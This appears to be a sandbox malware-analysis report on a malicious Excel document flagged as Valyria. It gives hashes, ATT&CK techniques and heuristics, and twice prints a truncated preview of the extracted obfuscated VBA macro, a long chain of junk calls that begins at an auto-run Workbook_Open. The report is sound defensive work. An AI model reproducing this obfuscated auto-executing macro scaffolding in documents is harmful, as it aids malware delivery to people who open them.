Valyria Office (OLE) malware analysis — malicious · 43282cb81e28bd2b

MALICIOUS

Office (OLE)

459.5 KB Created: 2017-07-31 21:33:49 Authoring application: Microsoft Excel First seen: 2018-09-04

MD5: d5fcb67076441a54ea2891ae2eaf1e04 SHA-1: 5190704e5fa4ded23c336403853b59e1100cd84e SHA-256: 43282cb81e28bd2b7d4086f9ba4a3c538c3d875871bdcf881e58c6b0da017824

188 Risk Score

Malware Insights

Valyria · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is identified as malicious by ClamAV with the signature Xls.Malware.Valyria-10036514-0. It contains VBA macros, specifically a Workbook_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of a Shell() call within the VBA code indicates that the macro is likely attempting to execute external commands or download and run a secondary payload. The document body displays a deceptive message in Turkish, 'Microsoft Excel Macro error, enable macro for viewing!', further supporting the lure to enable macros.

Heuristics 5

ClamAV: Xls.Malware.Valyria-10036514-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 111646 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	111646 bytes
SHA-256: `a93bc49a7181ef9fe334fca23c0325c00c20a05c56b86e7a3f89e04b2aa3d448`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Revive" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Revive1" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Public Sub WORKBOoK_OPeN(): Call BxXRyBtUEullqxI: End Sub Static Function BxXRyBtUEullqxI() As Long Call YWLZgeFDdMFbImw End Function Function YWLZgeFDdMFbImw() As Double Call YbLqaeqCChBbWFv End Function Private Function YbLqaeqCChBbWFv() As Currency Call xsiMYFgWvzgqxbT End Function Static Function xsiMYFgWvzgqxbT() As Long Call MLaGLqStUSrTNsK End Function Static Sub MLaGLqStUSrTNsK() Call lUhqXRnzimiHxuS End Sub Function lUhqXRnzimiHxuS() As Boolean Call CeJxYADIbGFIWst End Function Private Sub CeJxYADIbGFIWst() Call WRsQuUeetVAMayH End Sub Static Sub WRsQuUeetVAMayH() Call oUDlKDYYHqimJcS End Sub Static Sub oUDlKDYYHqimJcS() Call eimMeNZoqKzbEJB End Sub Private Sub eimMeNZoqKzbEJB() Call LyqKnfVGEdxdpkF End Sub Private Function LyqKnfVGEdxdpkF() As Double Call CFJyWoAHJxartyY End Function Private Function CFJyWoAHJxartyY() As String Call lNwKtGaLsSjSmGM End Function Sub lNwKtGaLsSjSmGM() Call rgIcVzHkwkcHtRX End Sub Private Sub rgIcVzHkwkcHtRX() Call pCoRlCiMeCBKpXD End Sub Private Function pCoRlCiMeCBKpXD() As Variant Call xNjxbutXDWFYFOz End Function Static Sub xNjxbutXDWFYFOz() Call wbzAHvzkHpqAKBO End Sub Function wbzAHvzkHpqAKBO() As Date Call FeesMmohBKFniZt End Function Private Function FeesMmohBKFniZt() As Object Call TFmZjYwSEcGrqJB End Function Private Function TFmZjYwSEcGrqJB() As Date Call dBBfDOPATygDXOQ End Function Private Function dBBfDOPATygDXOQ() As Byte Call tTtZqyBXsRrfofI End Function Sub tTtZqyBXsRrfofI() Call SdAJCZWdGliUXhP End Sub Private Function SdAJCZWdGliUXhP() As Integer Call jnbQEImmAFFVxer End Function Private Sub jnbQEImmAFFVxer() Call XJbdJTIQOWLljfq End Sub Sub XJbdJTIQOWLljfq() Call wZGZEtiAOQgfSoR End Sub Sub wZGZEtiAOQgfSoR() Call mopzYDjPxjxTNVB End Sub Static Function mopzYDjPxjxTNVB() As Boolean Call TDtyhWfhLCwVyxE End Function Static Sub TDtyhWfhLCwVyxE() Call YfVCtQhVuTdmvbg End Sub Static Function YfVCtQhVuTdmvbg() As Double Call HnIORiHZdnnNpjU End Function Function HnIORiHZdnnNpjU() As Integer Call zmLQPqRMCJaACdX End Function Static Function zmLQPqRMCJaACdX() As Single Call xHrFfssnlbACyjC End Function Static Function xHrFfssnlbACyjC() As Long Call FTmlVkDyKvDROby End Function Sub FTmlVkDyKvDROby() Call DgCoAlJMOOosTNN End Sub Private Function DgCoAlJMOOosTNN() As Object Call aFqwjOWumgIilCB End Function Static Function aFqwjOWumgIilCB() Call bKpNdOGtLBEjzVB End Function Private Function bKpNdOGtLBEjzVB() As Object Call zbNjbqwOEUjyarY End Function Static Sub zbNjbqwOEUjyarY() Call AYwNkpLzyqqYxrH End Sub Private Sub AYwNkpLzyqqYxrH() Call oDMNaBDrrGlPaLX End Sub Static Sub oDMNaBDrrGlPaLX() Call lahtmJcecHvKzRE End Sub Function lahtmJcecHvKzRE() As Currency Call MbYqOjbWMcwXrAv End Function Private Function MbYqOjbWMcwXrAv() As Object Call szsbIDtCFujATvP End Function Private Sub szsbIDtCFujATvP() Call iOcCcNuSoNApOcy End Sub Static Sub iOcCcNuSoNApOcy() Call PdfAlgqkCgzrzDC End Sub Function PdfAlgqkCgzrzDC() As String Call GkzoToVmGBbEDRV End Function Function GkzoToVmGBbEDRV() Call osmArGvppVlfxZJ End Function Private Sub osmArGvppVlfxZJ() Call vMySSzbPtndVEkU End Sub Static Sub vMySSzbPtndVEkU() Call fMVrFQgExJyVGZs End Sub Function fMVrFQgExJyVGZs() Call AtZnZuOBBZGmPhv End Function Private Sub AtZnZuOBBZGmPhv() Call zGpqEvUOFtrOVUL End Sub Static Function zGpqEvUOFtrOVUL() As Byte Call IKUiJmJLyOGBtsq End Function ... (truncated)

SHA-256: a93bc49a7181ef9fe334fca23c0325c00c20a05c56b86e7a3f89e04b2aa3d448

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Revive"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Revive1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WORKBOoK_OPeN(): Call BxXRyBtUEullqxI: End Sub
Static Function BxXRyBtUEullqxI() As Long
Call YWLZgeFDdMFbImw
End Function
Function YWLZgeFDdMFbImw() As Double
Call YbLqaeqCChBbWFv
End Function
Private Function YbLqaeqCChBbWFv() As Currency
Call xsiMYFgWvzgqxbT
End Function
Static Function xsiMYFgWvzgqxbT() As Long
Call MLaGLqStUSrTNsK
End Function
Static Sub MLaGLqStUSrTNsK()
Call lUhqXRnzimiHxuS
End Sub
Function lUhqXRnzimiHxuS() As Boolean
Call CeJxYADIbGFIWst
End Function
Private Sub CeJxYADIbGFIWst()
Call WRsQuUeetVAMayH
End Sub
Static Sub WRsQuUeetVAMayH()
Call oUDlKDYYHqimJcS
End Sub
Static Sub oUDlKDYYHqimJcS()
Call eimMeNZoqKzbEJB
End Sub
Private Sub eimMeNZoqKzbEJB()
Call LyqKnfVGEdxdpkF
End Sub
Private Function LyqKnfVGEdxdpkF() As Double
Call CFJyWoAHJxartyY
End Function
Private Function CFJyWoAHJxartyY() As String
Call lNwKtGaLsSjSmGM
End Function
Sub lNwKtGaLsSjSmGM()
Call rgIcVzHkwkcHtRX
End Sub
Private Sub rgIcVzHkwkcHtRX()
Call pCoRlCiMeCBKpXD
End Sub
Private Function pCoRlCiMeCBKpXD() As Variant
Call xNjxbutXDWFYFOz
End Function
Static Sub xNjxbutXDWFYFOz()
Call wbzAHvzkHpqAKBO
End Sub
Function wbzAHvzkHpqAKBO() As Date
Call FeesMmohBKFniZt
End Function
Private Function FeesMmohBKFniZt() As Object
Call TFmZjYwSEcGrqJB
End Function
Private Function TFmZjYwSEcGrqJB() As Date
Call dBBfDOPATygDXOQ
End Function
Private Function dBBfDOPATygDXOQ() As Byte
Call tTtZqyBXsRrfofI
End Function
Sub tTtZqyBXsRrfofI()
Call SdAJCZWdGliUXhP
End Sub
Private Function SdAJCZWdGliUXhP() As Integer
Call jnbQEImmAFFVxer
End Function
Private Sub jnbQEImmAFFVxer()
Call XJbdJTIQOWLljfq
End Sub
Sub XJbdJTIQOWLljfq()
Call wZGZEtiAOQgfSoR
End Sub
Sub wZGZEtiAOQgfSoR()
Call mopzYDjPxjxTNVB
End Sub
Static Function mopzYDjPxjxTNVB() As Boolean
Call TDtyhWfhLCwVyxE
End Function
Static Sub TDtyhWfhLCwVyxE()
Call YfVCtQhVuTdmvbg
End Sub
Static Function YfVCtQhVuTdmvbg() As Double
Call HnIORiHZdnnNpjU
End Function
Function HnIORiHZdnnNpjU() As Integer
Call zmLQPqRMCJaACdX
End Function
Static Function zmLQPqRMCJaACdX() As Single
Call xHrFfssnlbACyjC
End Function
Static Function xHrFfssnlbACyjC() As Long
Call FTmlVkDyKvDROby
End Function
Sub FTmlVkDyKvDROby()
Call DgCoAlJMOOosTNN
End Sub
Private Function DgCoAlJMOOosTNN() As Object
Call aFqwjOWumgIilCB
End Function
Static Function aFqwjOWumgIilCB()
Call bKpNdOGtLBEjzVB
End Function
Private Function bKpNdOGtLBEjzVB() As Object
Call zbNjbqwOEUjyarY
End Function
Static Sub zbNjbqwOEUjyarY()
Call AYwNkpLzyqqYxrH
End Sub
Private Sub AYwNkpLzyqqYxrH()
Call oDMNaBDrrGlPaLX
End Sub
Static Sub oDMNaBDrrGlPaLX()
Call lahtmJcecHvKzRE
End Sub
Function lahtmJcecHvKzRE() As Currency
Call MbYqOjbWMcwXrAv
End Function
Private Function MbYqOjbWMcwXrAv() As Object
Call szsbIDtCFujATvP
End Function
Private Sub szsbIDtCFujATvP()
Call iOcCcNuSoNApOcy
End Sub
Static Sub iOcCcNuSoNApOcy()
Call PdfAlgqkCgzrzDC
End Sub
Function PdfAlgqkCgzrzDC() As String
Call GkzoToVmGBbEDRV
End Function
Function GkzoToVmGBbEDRV()
Call osmArGvppVlfxZJ
End Function
Private Sub osmArGvppVlfxZJ()
Call vMySSzbPtndVEkU
End Sub
Static Sub vMySSzbPtndVEkU()
Call fMVrFQgExJyVGZs
End Sub
Function fMVrFQgExJyVGZs()
Call AtZnZuOBBZGmPhv
End Function
Private Sub AtZnZuOBBZGmPhv()
Call zGpqEvUOFtrOVUL
End Sub
Static Function zGpqEvUOFtrOVUL() As Byte
Call IKUiJmJLyOGBtsq
End Function
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.